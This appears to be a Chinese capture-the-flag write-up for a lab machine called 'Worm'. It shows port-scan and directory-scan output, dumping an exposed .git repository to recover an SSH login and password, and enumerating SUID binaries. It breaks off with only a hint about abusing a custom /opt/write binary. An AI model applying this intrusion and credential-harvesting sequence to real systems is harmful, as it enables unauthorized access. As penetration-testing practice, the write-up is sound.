Worm

192.168.100.47

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@LAPTOP-O235O5EH [~/Desktop/test] ➜  rustscan -a 192.168.100.47                                                                                   [16:28:54]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.47:22
Open 192.168.100.47:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 16:28 CST
Initiating ARP Ping Scan at 16:28
Scanning 192.168.100.47 [1 port]
Completed ARP Ping Scan at 16:28, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:28
Completed Parallel DNS resolution of 1 host. at 16:29, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 16:29
Scanning 192.168.100.47 [2 ports]
Discovered open port 22/tcp on 192.168.100.47
Discovered open port 80/tcp on 192.168.100.47
Completed SYN Stealth Scan at 16:29, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.47
Host is up, received arp-response (0.00043s latency).
Scanned at 2026-01-21 16:29:06 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:6E:53:BB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80/tcp目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@LAPTOP-O235O5EH [/opt/tools] ➜  dirsearch -u http://192.168.100.47                                                    [16:57:39]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /opt/tools/reports/http_192.168.100.47/_26-01-21_16-57-50.txt

Target: http://192.168.100.47/

[16:57:50] Starting:
[16:57:51] 301 -  315B  - /.git  ->  http://192.168.100.47/.git/
[16:57:51] 200 -  607B  - /.git/
[16:57:51] 200 -    2B  - /.git/COMMIT_EDITMSG
[16:57:51] 200 -  412B  - /.git/branches/
[16:57:51] 200 -   73B  - /.git/description
[16:57:51] 200 -   92B  - /.git/config
[16:57:51] 200 -   23B  - /.git/HEAD
[16:57:51] 200 -  674B  - /.git/hooks/
[16:57:51] 200 -  217B  - /.git/index
[16:57:51] 200 -  240B  - /.git/info/exclude
[16:57:51] 200 -  460B  - /.git/info/
[16:57:51] 301 -  325B  - /.git/logs/refs  ->  http://192.168.100.47/.git/logs/refs/
[16:57:51] 200 -  484B  - /.git/logs/
[16:57:51] 200 -  558B  - /.git/logs/HEAD
[16:57:51] 301 -  331B  - /.git/logs/refs/heads  ->  http://192.168.100.47/.git/logs/refs/heads/
[16:57:51] 200 -  558B  - /.git/logs/refs/heads/master
[16:57:51] 200 -  533B  - /.git/objects/
[16:57:51] 200 -  464B  - /.git/refs/
[16:57:51] 301 -  326B  - /.git/refs/heads  ->  http://192.168.100.47/.git/refs/heads/
[16:57:51] 200 -   41B  - /.git/refs/heads/master
[16:57:51] 301 -  325B  - /.git/refs/tags  ->  http://192.168.100.47/.git/refs/tags/
[16:57:51] 403 -  279B  - /.ht_wsr.txt
[16:57:51] 403 -  279B  - /.htaccess.bak1
[16:57:51] 403 -  279B  - /.htaccess.orig
[16:57:51] 403 -  279B  - /.htaccess.sample
[16:57:51] 403 -  279B  - /.htaccess.save
[16:57:51] 403 -  279B  - /.htaccess_orig
[16:57:51] 403 -  279B  - /.htaccess_extra
[16:57:51] 403 -  279B  - /.htaccessBAK
[16:57:51] 403 -  279B  - /.htaccess_sc
[16:57:51] 403 -  279B  - /.htaccessOLD2
[16:57:51] 403 -  279B  - /.htaccessOLD
[16:57:51] 403 -  279B  - /.htm
[16:57:51] 403 -  279B  - /.html
[16:57:51] 403 -  279B  - /.htpasswd_test
[16:57:51] 403 -  279B  - /.htpasswds
[16:57:51] 403 -  279B  - /.httr-oauth
[16:57:51] 403 -  279B  - /.php
[16:58:02] 403 -  279B  - /server-status
[16:58:02] 403 -  279B  - /server-status/

Task Completed

存在git泄露

gitdump

1
python3 git-dump.py http://192.168.100.47/

查看日志

1
git log -p

image

得到凭证

june:mTdwC2mn94UlBr31y56t

提权

june -> root

1
ssh june@192.168.100.47

find搜索suid权限的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
june@Worm:~$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/write

方案一

opt下面的write很可以,下载下来分析

image

丢给ai分析

0a50ec23881e281c4ac7dab76c859fda

dde2bc28b242e904d411b2190a895eba

核心就是让写入文件失败